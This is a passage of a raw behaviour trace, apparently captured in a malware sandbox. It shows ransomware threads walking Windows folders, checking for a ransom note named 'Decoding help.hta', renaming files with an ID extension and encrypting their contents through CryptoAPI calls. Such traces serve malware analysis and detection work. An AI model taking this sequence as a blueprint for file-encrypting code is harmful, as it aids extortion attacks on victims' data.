lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.129] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.129] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile42.bmp") returned -1 [0058.129] lstrlenW (lpString="usertile42.bmp") returned 14 [0058.129] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.129] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.129] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile42.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" [0058.129] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" [0058.129] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.129] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae653943, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae653943, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddd0f375, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile43.bmp", cAlternateFileName="")) returned 1 [0058.129] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.129] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.130] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.130] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile43.bmp") returned -1 [0058.130] lstrlenW (lpString="usertile43.bmp") returned 14 [0058.130] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.130] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.130] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile43.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" [0058.130] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" [0058.130] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.130] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.130] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae679aa0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae679aa0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddd354d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile44.bmp", cAlternateFileName="")) returned 1 [0058.130] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.130] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.130] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.130] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile44.bmp") returned -1 [0058.130] lstrlenW (lpString="usertile44.bmp") returned 14 [0058.130] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.130] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.131] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile44.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" [0058.131] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" [0058.131] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.131] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.131] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae679aa0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae679aa0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddd354d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile44.bmp", cAlternateFileName="")) returned 0 [0058.131] FindClose (in: hFindFile=0x671530 | out: hFindFile=0x671530) returned 1 Thread: id = 623 os_tid = 0xe00 [0048.846] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*", lpFindFileData=0x17a1fd30 | out: lpFindFileData=0x17a1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd49670, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x26cfc430, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8050 [0050.377] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.377] FindNextFileW (in: hFindFile=0x5d8050, lpFindFileData=0x17a1fd30 | out: lpFindFileData=0x17a1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd49670, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x26cfc430, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.377] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.377] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.377] FindNextFileW (in: hFindFile=0x5d8050, lpFindFileData=0x17a1fd30 | out: lpFindFileData=0x17a1fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x26cfc430, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x26cfc430, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x26cfc430, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0050.378] lstrcpyW (in: lpString1=0x25197a78, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*" [0050.378] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*") returned 45 [0050.378] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\Decoding help.hta" [0050.378] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\decoding help.hta")) returned 0x2020 [0050.378] FindNextFileW (in: hFindFile=0x5d8050, lpFindFileData=0x17a1fd30 | out: lpFindFileData=0x17a1fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfd23510, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0xfd23510, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfd23510, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="sql2D37.tmp", cAlternateFileName="")) returned 1 [0050.378] lstrcpyW (in: lpString1=0x25197a78, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*" [0050.378] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*") returned 45 [0050.378] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\Decoding help.hta" [0050.378] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\decoding help.hta")) returned 0x2020 [0050.378] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sql2D37.tmp") returned -1 [0050.378] lstrlenW (lpString="sql2D37.tmp") returned 11 [0050.378] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*" [0050.378] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*") returned 45 [0050.378] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\", lpString2="sql2D37.tmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D37.tmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D37.tmp" [0050.378] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D37.tmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D37.tmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D37.tmp" [0050.378] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D37.tmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D37.tmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D37.tmp.[ID]g9uZrLhJaygpwRm1[ID]" [0050.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D37.tmp" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql2d37.tmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D37.tmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql2d37.tmp.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0053.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D37.tmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql2d37.tmp.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0053.654] CreateFileMappingA (hFile=0x314, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x720 [0053.654] CryptAcquireContextA (in: phProv=0x17a1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x17a1fcec*=0x3449358) returned 1 [0055.140] CryptGenKey (in: hProv=0x3449358, Algid=0x6610, dwFlags=0x1, phKey=0x17a1fce8 | out: phKey=0x17a1fce8*=0x5db778) returned 1 [0055.140] CryptExportKey (in: hKey=0x5db778, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x17a1fbe4, pdwDataLen=0x17a1fce4 | out: pbData=0x17a1fbe4*, pdwDataLen=0x17a1fce4*=0x2c) returned 1 [0055.141] MapViewOfFile (hFileMappingObject=0x720, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5000) returned 0x2d0000 [0055.143] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x17a1fbe4*, pdwDataLen=0x17a1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x17a1fbe4*, pdwDataLen=0x17a1fcf8*=0x100) returned 1 [0055.143] CryptEncrypt (in: hKey=0x5db778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x17a1fce4*=0x5000, dwBufLen=0x5000 | out: pbData=0x2d0000*, pdwDataLen=0x17a1fce4*=0x5000) returned 1 [0055.144] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0055.145] CloseHandle (hObject=0x720) returned 1 [0055.145] CryptDestroyKey (hKey=0x5db778) returned 1 [0055.145] CryptReleaseContext (hProv=0x3449358, dwFlags=0x0) returned 1 [0055.145] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.146] WriteFile (in: hFile=0x314, lpBuffer=0x17a1fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x17a1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x17a1fbe4*, lpNumberOfBytesWritten=0x17a1fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.425] WriteFile (in: hFile=0x314, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x17a1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x17a1fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.425] CloseHandle (hObject=0x314) returned 1 [0056.426] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D37.tmp.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0056.426] FindNextFileW (in: hFindFile=0x5d8050, lpFindFileData=0x17a1fd30 | out: lpFindFileData=0x17a1fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfd49670, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0xfd49670, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0xfd49670, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="sql2D47.tmp", cAlternateFileName="")) returned 1 [0056.692] lstrcpyW (in: lpString1=0x2ab59180, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*" [0056.692] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*") returned 45 [0056.692] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\Decoding help.hta" [0056.692] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\decoding help.hta")) returned 0x1 [0059.146] lstrcmpiW (lpString1="Decoding help.hta", lpString2="sql2D47.tmp") returned -1 [0059.146] lstrlenW (lpString="sql2D47.tmp") returned 11 [0059.146] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*" [0059.146] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*.*") returned 45 [0059.147] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\", lpString2="sql2D47.tmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D47.tmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D47.tmp" [0059.147] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D47.tmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D47.tmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D47.tmp" [0059.147] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D47.tmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D47.tmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D47.tmp.[ID]g9uZrLhJaygpwRm1[ID]" [0059.147] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D47.tmp" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql2d47.tmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D47.tmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql2d47.tmp.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql2D47.tmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql2d47.tmp.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd94 [0061.618] CreateFileMappingA (hFile=0xd94, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x894 [0061.619] CryptAcquireContextA (phProv=0x17a1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 624 os_tid = 0xe04 [0048.850] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\*.*", lpFindFileData=0x17ddfd30 | out: lpFindFileData=0x17ddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8038cbd7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8038cbd7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e34b0 [0048.850] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.850] FindNextFileW (in: hFindFile=0x5e34b0, lpFindFileData=0x17ddfd30 | out: lpFindFileData=0x17ddfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8038cbd7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8038cbd7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.851] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.851] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.851] FindNextFileW (in: hFindFile=0x5e34b0, lpFindFileData=0x17ddfd30 | out: lpFindFileData=0x17ddfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8038cbd7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bef7178, ftLastAccessTime.dwHighDateTime=0x1ca0444, 